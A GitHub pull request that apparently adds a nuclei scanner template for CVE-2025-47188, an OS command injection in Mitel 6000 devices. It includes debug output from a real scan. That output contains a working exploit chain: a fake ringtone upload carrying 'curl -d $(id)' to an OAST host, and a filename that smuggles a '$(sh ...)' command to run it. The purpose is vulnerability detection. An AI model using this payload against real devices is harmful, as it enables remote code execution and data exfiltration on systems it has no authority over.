Skip to content

Add CVE-2025-47188 Mitel 6000 OS Command Injection template #13454

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 4 commits into
base: main
Choose a base branch
from
Open

Add CVE-2025-47188 Mitel 6000 OS Command Injection template #13454

wants to merge 4 commits into from
+54 −0

Conversation

matejsmycka
Copy link
Contributor

@matejsmycka matejsmycka commented Oct 1, 2025
edited
Loading

Template / PR Information

Maybe this could be rewritten as Network template? Since it targets 49249.

nuclei -t mitel.yaml -u <REDACTED>:49249 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2025-47188] Dumped HTTP request for http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0

POST /cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0 HTTP/1.1
Host: <REDACTED>:49249
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Connection: close
Content-Length: 278
Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f
Accept-Encoding: gzip

------0ba2fc3a8c91370bd74c5f7ab65fda3f
Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="y4coTge0.txt"

RIFF$WAVEfmt D��Xdata
curl -d $(id) d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live
------0ba2fc3a8c91370bd74c5f7ab65fda3f--
[DBG] [CVE-2025-47188] Dumped HTTP response http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html><head><meta http-equiv="refresh" content="0; url=http://<REDACTED>/ringtone.html?success=0" /></head><body></body></html>
[d3em5vr052qsadtl3ueg6tqwoeqkeio6h] Received DNS interaction from 147.251.4.41 at 2025-10-01 17:21:06
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 27464
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	IN	 A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 27464
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	IN	 A

;; ANSWER SECTION:
d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	3600	IN	A	178.128.210.172

;; AUTHORITY SECTION:
d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	3600	IN	NS	ns1.oast.live.
d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	3600	IN	NS	ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.	3600	IN	A	178.128.210.172
ns2.oast.live.	3600	IN	A	178.128.210.172


[CVE-2025-47188:word-1] [http] [critical] http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0
[INF] [CVE-2025-47188] Dumped HTTP request for http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0

POST /cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0 HTTP/1.1
Host: <REDACTED>:49249
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Content-Length: 255
Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f
Accept-Encoding: gzip

------0ba2fc3a8c91370bd74c5f7ab65fda3f
Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="fake$(sh ${HOME}userdata${HOME}ringtone${HOME}y4coTge0.txt).wav"


This is an invalid WAV file
------0ba2fc3a8c91370bd74c5f7ab65fda3f--
[WRN] [CVE-2025-47188] Could not execute request for <REDACTED>:49249: cause="net/http: timeout awaiting response headers" chain="got err while executing http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0"
[INF] Scan completed in 28.669099673s. 1 matches found.

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@github-actions github-actions bot requested a review from DhiyaneshGeek October 1, 2025 17:24
@matejsmycka
Copy link
Contributor Author

Tested on 40+ devices

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@DhiyaneshGeek DhiyaneshGeek Awaiting requested review from DhiyaneshGeek

Assignees

@ritikchaddha ritikchaddha

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@matejsmycka @ritikchaddha